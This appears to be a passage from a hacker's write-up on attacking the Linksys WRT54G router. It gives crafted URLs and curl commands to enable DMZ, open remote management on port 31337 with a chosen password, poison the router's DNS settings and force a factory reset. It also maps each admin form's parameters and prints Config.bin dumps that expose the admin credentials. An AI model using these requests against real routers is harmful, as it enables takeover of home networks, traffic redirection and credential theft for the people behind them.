http://192.168.1.1/dmz.tri?action=Apply&dmz_enable=1&dmz_ipaddr=100&layout=en
How:
curl -d 'action=Apply&dmz_enable=1&dmz_ipaddr=100&layout=en' http://192.168.1.1/dmz.tri
############################################################################
What:
disable DMZ.
Where:
http://192.168.1.1/dmz.tri?action=Apply&dmz_enable=0&layout=en
How:
curl -d 'action=Apply&dmz_enable=0&layout=en' http://192.168.1.1/dmz.tri
############################################################################
What:
enable remote management on port 31337 with password 'asdf', wireless web access and UPnP enabled.
Where:
http://192.168.1.1/manage.tri?remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=asdf
&http_passwdConfirm=asdf&_http_enable=1&web_wl_filter=1&remote_management=1&http_wanport=31337
&upnp_enable=1&layout=en
How:
curl -d
'remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=asdf&http_passwdConfirm=asdf
&_http_enable=1&web_wl_filter=1&remote_management=1&http_wanport=31337&upnp_enable=1&layout=en'
http://192.168.1.1/manage.tri
############################################################################
/******************************
#index.html# 0x000000.js 0x000000.txt 0x000001.js 0x000002.js 0x000003.js 0x000004.js 0x000005.js 0x000006.js 0x000007.js 0x000008.js 0x000009.js 0x00000A.js all.back all.html all.txt anal articles articles_old crowl.html index.html jquery-1.3.2.min.js split.sh while Defaults: ******
******************************/
############################################################################
Setup->Basic Setup:
POST /Basic.tri
dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192
&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1
&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168
&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0
&dns0_0=0&dns0_1=0&dns0_2=0&dns0_3=0&dns1_0=0&dns1_1=0&dns1_2=0&dns1_3=0&dns2_0=0
&dns2_1=0&dns2_2=0&dns2_3=0&wins_0=0&wins_1=0&wins_2=0&wins_3=0
&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en
############################################################################
Setup->DDNS:
POST /ddns.tri ddns_enable=0
############################################################################
Setup->MAC Address Clone:
POST /WanMac.tri action=Apply&mac_clone_enable=0
############################################################################
Setup->Advanced Routing:
POST /AdvRoute.tri
action=Apply&bSRoute=1&oldOpMode=0&wk_mode=0&route_page=0&
route_name=&route_ipaddr_0=0&route_ipaddr_1=0&route_ipa
ddr_2=0&route_ipaddr_3=0&route_netmask_0=0&route_netmask_1=0&
route_netmask_2=0&route_netmask_3=0&route_gateway_0=0&route_gateway_1=0
&route_gateway_2=0&route_gateway_3=0&route_ifname=0
############################################################################
Wireless->Basic Wireless Settings:
POST /WBasic.tri
submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=linksys&
channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en
############################################################################
Wireless->Wireless Security:
POST /Security.tri SecurityMode=0&layout=en
############################################################################
Wireless->Wireless MAC Filter:
POST /WFilter.tri wl_macmode1=0
############################################################################
Wireless->Advanced Wireless Settings:
POST /Advanced.tri
AuthType=0&basicrate=default&wl_rate=0&wMode=3§ype=0&
ctspmode=off&FrameBurst=off&BeaconInterval=100&Dtim=1&FragLen=2346
&RTSThre=2347&apisolation=0&apSESmode=1
############################################################################
Security->Firewall:
POST /fw.tri ident_pass=1&action=Apply&block_wan=1&IGMP=1&_ident_pass=1
############################################################################
Security->VPN:
POST /vpn.tri action=Apply&ipsec_pass=1&pptp_pass=1&l2tp_pass=1
############################################################################
Access Restrictions->Internet Access:
POST /filter.tri
action=Apply&f_id=0&f_status1=disable&f_name=&f_status2=1&
day_all=1&time_all=1&FROM_AMPM=0&TO_AMPM=0&blocked_serv
ice0=NONE&blocked_service1=NONE&host0=&host1=&host2=&host3=
&url0=&url1=&url2=&url3=&url4=&url5=
############################################################################
Applications & Gaming->Port Range Forward:
POST /PortRange.tri
action=Apply&RuleID_0=0&name0=&from0=0&to0=0&pro0=both&
ip0=0&RuleID_1=0&name1=&from1=0&to1=0&pro1=both&ip1=0
&RuleID_2=0&name2=&from2=0&to2=0&pro2=both&ip2=0&
RuleID_3=0&name3=&from3=0&to3=0&pro3=both&ip3=0&
RuleID_4=0&name4=&from4=0&to4=0&pro4=both&ip4=0&
RuleID_5=0&name5=&from5=0&to5=0&pro5=both&ip5=0&
RuleID_6=0&name6=&from6=0&to6=0&pro6=both&ip6=0&
RuleID_7=0&name7=&from7=0&to7=0&pro7=both&ip7=0&
RuleID_8=0&name8=&from8=0&to8=0&pro8=both&ip8=0&
RuleID_9=0&name9=&from9=0&to9=0&pro9=both&ip9=0
############################################################################
Applications & Gaming->Port Triggering:
POST /ptrigger.tri
RuleID_0=&service_name0=&tfrom0=0&tto0=0&rfrom0=0&rto0=0
&RuleID_1=&service_name1=&tfrom1=0&tto1=0&rfrom1=0&
rto1=0&RuleID_2=&service_name2=&tfrom2=0&tto2=0&rfrom2=0
&rto2=0&RuleID_3=&service_name3=&tfrom3=0&tto3=0&rfrom3=0
&rto3=0&RuleID_4=&service_name4=&tfrom4=0&tto4=0&rfrom4=0
&rto4=0&RuleID_5=&service_name5=&tfrom5=0&tto5=0&rfrom5=0
&rto5=0&RuleID_6=&service_name6=&tfrom6=0&tto6=0&rfrom6=0
&rto6=0&RuleID_7=&service_name7=&tfrom7=0&tto7=0&rfrom7=0
&rto7=0&RuleID_8=&service_name8=&tfrom8=0&tto8=0&rfrom8=0
&rto8=0&RuleID_9=&service_name9=&tfrom9=0&tto9=0&rfrom9=0
&rto9=0&trinamelist=&layout=en
############################################################################
Applications & Gaming->DMZ:
POST /dmz.tri action=Apply&dmz_enable=0&layout=en
############################################################################
Applications & Gaming->QoS:
POST /qos.tri
hport_priority_1=0&hport_priority_2=0&hport_priority_3=0&hport_priority_4=0
&hport_flow_control_1=1&hport_flow_control_2=1&hport_flow_control_3=1
&hport_flow_control_4=1&happname1=&hport1priority=0&happport1=0
&happname2=&hport2priority=0&happport2=0&happname3=&hport3priority=0
&happport3=0&happname4=&hport4priority=0&happport4=0&happname5=&
hport5priority=0&happport5=0&happname6=&hport6priority=0&happport6=0
&happname7=&hport7priority=0&happport7=0&happname8=&
hport8priority=0&happport8=0&QoS=0&wl_wme=off&layout=en
############################################################################
Administration->Management:
POST /manage.tri
remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&
http_passwd=d6nw5v1x2pc7st9m&http_passwdConfirm=d6nw5v1x2pc7st9m&
_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en
############################################################################
Administration->Log:
POST /ctlog.tri log_enable=0
############################################################################
Administration->Diagnostics->Ping:
POST /ping.tri action=start&ping_ip=kinqpinz.info&ping_times=5
############################################################################
Administration->Diagnostics->Trace Route:
POST /tracert.tri action=start&traceroute_ip=kinqpinz.info
############################################################################
Status->Router->DHCP Release:
POST /rstatus.tri action=release&wan_pro=0&conn_stats=4294967295&layout=en
############################################################################
Status->Router->DHCP Renew:
POST /rstatus.tri action=renew&wan_pro=0&conn_stats=4294967295&layout=en
############################################################################
@author: meathive
@Router type: WRT54G
@Manufacturer: Linksys
So with everybody poisoning DNS I may as well add another attack vector against the WRT54G! I've also added how to restore the factory defaults.
############################################################################
What:
poison dns.
dns 1 = 1.2.3.4
dns 2 = 5.6.7.8
dns 3 = 9.8.7.6
Where:
http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0
&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168
&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=
192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=
&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1
&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50
&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5
&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7
&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=
%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en
How:
curl -d
'dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168
&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=
&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0
&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192
&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable
&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3
&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8
&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&
time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&
layout=en' http://192.168.1.1/Basic.tri
############################################################################
What:
restore factory defaults.
Where:
http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes&layout=en
How:
curl -d 'FactoryDefaults=Yes&layout=en' http://192.168.1.1/factdefa.tri
############################################################################
@author: meathive
@Router type: WRT54G
@Manufacturer: Linksys
A couple new things I've found inside the default configuration file, http://192.168.1.1/Config.bin. The router uses a military NTP server, ntp2.usno.navy.mil, for synchronizing time. The device's virtual memory/file system info is located at /mem/pricf/0, which I'm still exploring. The only reference I've found in regards to /mem/pricf/0, by the way, is on a Korean site so it's still relatively new territory. By simply viewing the ASCII within Config.bin we can view the administrative user name and password, external and internal IPs, router name, available service configurations, and so on. It becomes more interesting when the device is not left in default mode as more information is available pertaining to what is and isn't left on. The firmware seems to come from a company named Intoto, http://www.intoto.com/company.shtml.
Here is a dump of Config.bin using the default settings:
TROC
/mem/pricf/0
(c) 2001 Copyright Intoto, Inc
5VGWJ
WRT54G
linksysrouter
self
ntp2.usno.navy.mil
root
00000000000000
mirror0
None
None
httpSharenet
mirror0
httpSharenet
httpSubnet
httpSharenet
httpSubnet
19192.168.1.1
httpSharenet
httpSubnet
PPPOE
PPPOE
PPTP
PPTP
L2TP
L2TP
PPPOE
PPPoE
Med=vl1,AC=,Fr=Sync
PPTP
PPTP
:M-2:I-0.0.0.0:F-2:B-2
L2TP
L2TP
M:2:P:0.0.0.0:K:0:A:0:F:1:B:0:T:33000:R:33300:Y:555:G:Intoto-Net:U:Intoto-India
Intoto
IntotoSoft
Intoto
WANIPConn1
WANIPConn1
—-
admin
admin
linksys
long
default
langpak_en
PING
TFTP
IMAP
HTTPS
SNMP
NNTP
POP3
SMTP
HTTP
TELNET
RegularNAT1
RegularNAT1
RegularNAT1
RegularNAT1
RegularNAT1
DefaultTcp
DefaultUdp
DefaultIcmp
ftpinac
dnsinac
hainac
gatekeeper
msgudp
tftp
pcanywhere
l2tp
rtsp554
rtsp7070
h323
msgtcp
pptp
n2pe
cuseeme
mszone
CORP
SELF
DefPoly
DefISAKMP
DefPPTP
DefL2TP
I should mention that the external IP was available to me when I dumped Config.bin after making some changes in the Web interface. By default, it is not viewable. Here the admin password is 'asdf':
TROC
/mem/pricf/0
(c) 2001 Copyright Intoto, Inc
5VGWJ
WRT54G
linksysrouter
self
ntp2.usno.navy.mil
root
00000000000000
mirror0
None
None
httpSharenet
mirror0
httpSharenet
httpSubnet
httpSharenet
httpSubnet
19192.168.1.1
httpSharenet
httpSubnet
6868.87.85.98;68.87.69.146
httpSharenet
httpSubnet
hshsd1.co.comcast.net.
httpSharenet
httpSubnet
PPPOE
PPPOE
PPTP
PPTP
L2TP
L2TP
PPPOE
PPPoE
Med=vl1,AC=,Fr=Sync
PPTP
PPTP
:M-2:I-0.0.0.0:F-2:B-2
L2TP
L2TP
M:2:P:0.0.0.0:K:0:A:0:F:1:B:0:T:33000:R:33300:Y:555:G:Intoto-Net:U:Intoto-India
Intoto
IntotoSoft
Intoto
WANIPConn1
x.x.x.x — external IP now exists!
WANIPConn1
admin
asdf
linksys
long
default
langpak_en
PING
TFTP
IMAP
HTTPS
SNMP
NNTP
POP3
SMTP
HTTP
TELNET
RegularNAT1
RegularNAT1
RegularNAT1
RegularNAT1
RegularNAT1
DefaultTcp
DefaultUdp
DefaultIcmp
ftpinac
dnsinac
hainac
gatekeeper
msgudp
tftp
pcanywhere
l2tp
rtsp554
rtsp7070
h323
msgtcp
pptp
n2pe
cuseeme
mszone
CORP
SELF
DefPoly
DefISAKMP
DefPPTP
DefL2TP